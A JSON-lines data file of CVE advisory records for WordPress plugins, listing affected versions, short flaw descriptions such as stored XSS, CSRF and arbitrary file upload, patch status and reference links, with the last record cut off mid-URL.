{"CVE_ID":"CVE-2021-4330","slug":"envato-elements","versionImpact":"2.0.10","description":"The Envato Elements & Download and Template Kit \u2013 Import plugins for WordPress are vulnerable to arbitrary file uploads due to insufficient validation of file type upon extracting uploaded Zip files in the installFreeTemplateKit and uploadTemplateKitZipFile functions. This makes it possible for attackers with contributor-lever permissions and above to upload arbitrary files and potentially gain remote code execution in versions up to and including 1.0.13 of Template Kit \u2013 Import and versions up to and including 2.0.10 of Envato Elements & Download.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2617529%40envato-elements&new=2617529%40envato-elements&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2617529%40envato-elements&new=2617529%40envato-elements&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68fe17e2-d5ab-4ebd-a5c6-d65cea327abd\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68fe17e2-d5ab-4ebd-a5c6-d65cea327abd\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1160","slug":"bold-page-builder","versionImpact":"4.8.0","description":"The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Icon Link in all versions up to, and including, 4.8.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/818d3418-8e14-49b9-a112-8eab9eb3c283?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/818d3418-8e14-49b9-a112-8eab9eb3c283?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6309","slug":"attachment-file-icons","versionImpact":"1.3","description":"The Attachment File Icons (AF Icons) plugin for WordPress is vulnerable to Cross-Site Request Forgery to Arbitrary File Upload in versions up to, and including, 1.3. This is due to missing nonce validation in the 'afi_overview' function and missing file type validation in the 'upload_icons' function. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e3fd472-c8ea-42dc-93df-872361ec97f3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e3fd472-c8ea-42dc-93df-872361ec97f3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/attachment-file-icons\\\/tags\\\/1.3\\\/attachment-file-icons.php#L130\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/attachment-file-icons\\\/tags\\\/1.3\\\/attachment-file-icons.php#L130\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/attachment-file-icons\\\/tags\\\/1.3\\\/attachment-file-icons.php#L337\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/attachment-file-icons\\\/tags\\\/1.3\\\/attachment-file-icons.php#L337\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9177","slug":"themedy-toolbox","versionImpact":"1.0.14","description":"The Themedy Toolbox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's themedy_col, themedy_social_link, themedy_alertbox, and themedy_pullleft shortcodes in all versions up to, and including, 1.0.14, and up to, and including 1.0.15 for the plugin's themedy_button shortcode due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/755e0998-0f0d-4259-881d-ed07aecb0b10?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/755e0998-0f0d-4259-881d-ed07aecb0b10?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themedy-toolbox\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/themedy-toolbox\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157836\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157836\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10711","slug":"ithemelandco-woo-report","versionImpact":"1.5.1","description":"The WooCommerce Report plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.1. This is due to missing or incorrect nonce validation on the settings update functionality. This makes it possible for unauthenticated attackers to update arbitrary options that can be leveraged for privilege escalation via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1d21339-3a86-4bee-be86-2d2ab9190b26?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1d21339-3a86-4bee-be86-2d2ab9190b26?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ithemelandco-woo-report\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ithemelandco-woo-report\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ithemelandco.com\\\/docs\\\/woocommerce-report\\\/\",\"name\":\"https:\\\/\\\/ithemelandco.com\\\/docs\\\/woocommerce-report\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ithemelandco-woo-report\\\/trunk\\\/class\\\/setting_report.php#L1174\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ithemelandco-woo-report\\\/trunk\\\/class\\\/setting_report.php#L1174\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181117\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181117\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11374","slug":"twchat","versionImpact":"4.0.4","description":"The TWChat \u2013 Send or receive messages from users plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.0.4. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/twchat\\\/tags\\\/4.0.3\\\/classes\\\/Addon_controller.class.php#L198\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/twchat\\\/tags\\\/4.0.3\\\/classes\\\/Addon_controller.class.php#L198\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cb047d0-0056-432c-bae3-3ab926e39bcd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3cb047d0-0056-432c-bae3-3ab926e39bcd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11893","slug":"spoki","versionImpact":"2.15.14","description":"The Spoki \u2013 Chat Buttons and WooCommerce Notifications plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'spoki_button' shortcode in all versions up to, and including, 2.15.14 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spoki\\\/trunk\\\/spoki.php#L1256\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/spoki\\\/trunk\\\/spoki.php#L1256\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/spoki\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/spoki\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba965a6a-68ed-4383-93a7-593418df34a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ba965a6a-68ed-4383-93a7-593418df34a5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1667","slug":"wpschoolpress","versionImpact":"2.2.16","description":"The School Management System \u2013 WPSchoolPress plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check on the wpsp_UpdateTeacher() function in all versions up to, and including, 2.2.16. This makes it possible for authenticated attackers, with teacher-level access and above, to update arbitrary user details including email which makes it possible to request a password reset and access arbitrary user accounts, including administrators.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/tags\\\/2.2.16\\\/lib\\\/wpsp-ajaxworks-teacher.php#L544\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/tags\\\/2.2.16\\\/lib\\\/wpsp-ajaxworks-teacher.php#L544\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e54f98bc-c538-4f3c-b24a-6e778a3748ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e54f98bc-c538-4f3c-b24a-6e778a3748ef?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7297","slug":"twitter-posts","versionImpact":"1.0.2","description":"The TwitterPosts WordPress plugin through 1.0.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3632dfa1-2948-4622-a8fd-31edb8b22383\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3632dfa1-2948-4622-a8fd-31edb8b22383\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6063","slug":"xisearch-bar","versionImpact":"2.6","description":"The XiSearch bar plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6. This is due to missing or incorrect nonce validation on the 'xisearch-key-config' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xisearch-bar\\\/trunk\\\/xisearch.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/xisearch-bar\\\/trunk\\\/xisearch.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd828557-94f6-4278-98ef-bcf4d1d86440?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd828557-94f6-4278-98ef-bcf4d1d86440?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5811","slug":"listly","versionImpact":"2.7","description":"The Listly: Listicles For WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the Init() function in all versions up to, and including, 2.7. This makes it possible for unauthenticated attackers to delete arbitrary transient values on the WordPress site.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/listly\\\/trunk\\\/listly.php#L151\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/listly\\\/trunk\\\/listly.php#L151\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/listly\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/listly\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee6749f5-1dd0-4687-9a86-64fd1161321b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee6749f5-1dd0-4687-9a86-64fd1161321b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0554","slug":"quick-restaurant-menu","versionImpact":"2.0.2","description":"The Quick Restaurant Menu plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.0.2. This is due to missing or incorrect nonce validation on its AJAX actions. This makes it possible for unauthenticated attackers to update menu items, via forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfc7c214-8d76-453c-a05d-682aa425b06e\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfc7c214-8d76-453c-a05d-682aa425b06e\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quick-restaurant-menu\\\/tags\\\/2.0.2\\\/includes\\\/admin\\\/ajax-functions.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quick-restaurant-menu\\\/tags\\\/2.0.2\\\/includes\\\/admin\\\/ajax-functions.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2851871\\\/quick-restaurant-menu\\\/trunk?contextall=1&old=2788636&old_path=%2Fquick-restaurant-menu%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2851871\\\/quick-restaurant-menu\\\/trunk?contextall=1&old=2788636&old_path=%2Fquick-restaurant-menu%2Ftrunk\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36697","slug":"wp-gdpr-core","versionImpact":"2.1.1","description":"The WP GDPR plugin for WordPress is vulnerable to authorization bypass due to a missing capability check in versions up to, and including, 2.1.1. This makes it possible for unauthenticated attackers to delete any comment and modify the plugin\u2019s settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/032e775a-97be-4d93-bac3-094e35be4b11?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/032e775a-97be-4d93-bac3-094e35be4b11?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/unauthenticated-stored-xss-and-content-spoofing-vulnerabilities-in-wordpress-wp-gdpr-plugin-unpatched\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/unauthenticated-stored-xss-and-content-spoofing-vulnerabilities-in-wordpress-wp-gdpr-plugin-unpatched\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-wp-gdpr-multiple-vulnerabilities-2-1-1\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-wp-gdpr-multiple-vulnerabilities-2-1-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4636","slug":"user-private-files","versionImpact":"2.0.3","description":"The WordPress File Sharing Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1df04293-87e9-4ab4-975d-54d36a993ab0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1df04293-87e9-4ab4-975d-54d36a993ab0?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2961909\\\/user-private-files\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2961909\\\/user-private-files\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/xsn1210\\\/vul2\\\/blob\\\/main\\\/xss%5BWordPressFile%5D%20.md\",\"name\":\"https:\\\/\\\/github.com\\\/xsn1210\\\/vul2\\\/blob\\\/main\\\/xss%5BWordPressFile%5D%20.md\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5705","slug":"vk-filter-search","versionImpact":"2.3.1","description":"The VK Filter Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'vk_filter_search' shortcode in all versions up to, and including, 2.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/012946d4-82ce-48b9-9b9a-1fc49846dca6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/012946d4-82ce-48b9-9b9a-1fc49846dca6?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2983339\\\/vk-filter-search#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2983339\\\/vk-filter-search#file1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-filter-search\\\/tags\\\/2.3.1\\\/inc\\\/filter-search\\\/package\\\/class-vk-filter-search-shortcode.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/vk-filter-search\\\/tags\\\/2.3.1\\\/inc\\\/filter-search\\\/package\\\/class-vk-filter-search-shortcode.php#L40\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7084","slug":"voting-record","versionImpact":"2.0","description":"The Voting Record WordPress plugin through 2.0 is missing sanitisation as well as escaping, which could allow any authenticated users, such as subscriber to perform Stored XSS attacks","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e51e239-919b-4e74-a7ee-195f3817f907\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5e51e239-919b-4e74-a7ee-195f3817f907\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-7084.txt\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-7084.txt\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1159","slug":"bold-page-builder","versionImpact":"4.8.0","description":"The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 4.8.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e71386ea-0546-4aa7-b77a-e1824e80accc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e71386ea-0546-4aa7-b77a-e1824e80accc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3034441%40bold-page-builder&new=3034441%40bold-page-builder&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2252","slug":"droit-elementor-addons","versionImpact":"3.1.5","description":"The Droit Elementor Addons \u2013 Widgets, Blocks, Templates Library For Elementor Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 3.1.5 due to insufficient input sanitization and output escaping on user supplied attributes such as URL. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed0a9db6-24bd-48ba-befa-ce537304ab52?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed0a9db6-24bd-48ba-befa-ce537304ab52?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/droit-elementor-addons\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/droit-elementor-addons\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6180","slug":"eventon-lite","versionImpact":"2.2.15","description":"The EventON plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'eventon_import_settings' ajax action in all versions up to, and including, 2.2.15. This makes it possible for unauthenticated attackers to update plugin settings, including adding stored cross-site scripting to settings options displayed on event calendar pages.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12f3dc64-322d-4015-8c57-eaa41c9a1829?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12f3dc64-322d-4015-8c57-eaa41c9a1829?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/assets\\\/js\\\/admin\\\/wp_admin.js#L714\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/assets\\\/js\\\/admin\\\/wp_admin.js#L714\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/includes\\\/calendar\\\/class-calendar-event-structure.php#L590\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/eventon-lite\\\/trunk\\\/includes\\\/calendar\\\/class-calendar-event-structure.php#L590\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8633","slug":"form-maker","versionImpact":"1.15.27","description":"The Form Maker by 10Web \u2013 Mobile-Friendly Drag & Drop Contact Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 1.15.27 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b32cc12-c8d5-40b8-9510-42699beec581?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b32cc12-c8d5-40b8-9510-42699beec581?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/form-maker\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/form-maker\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156791\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156791\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11878","slug":"category-post-slider","versionImpact":"1.4","description":"The Category Post Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'category-post-slider' shortcode in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/category-post-slider\\\/tags\\\/1.4\\\/category-post-slider.php#L189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/category-post-slider\\\/tags\\\/1.4\\\/category-post-slider.php#L189\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e312e3eb-0da9-4ecf-aec6-86bfe08417f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e312e3eb-0da9-4ecf-aec6-86bfe08417f5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13847","slug":"portfolio-and-projects","versionImpact":"1.5.3","description":"The Portfolio and Projects plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-and-projects\\\/trunk\\\/includes\\\/admin\\\/class-wp-pap-admin.php?rev=2948311\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-and-projects\\\/trunk\\\/includes\\\/admin\\\/class-wp-pap-admin.php?rev=2948311\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-and-projects\\\/trunk\\\/includes\\\/admin\\\/settings\\\/wp-pap-img-popup-data.php?rev=2948311\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/portfolio-and-projects\\\/trunk\\\/includes\\\/admin\\\/settings\\\/wp-pap-img-popup-data.php?rev=2948311\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/portfolio-and-projects\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/portfolio-and-projects\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabil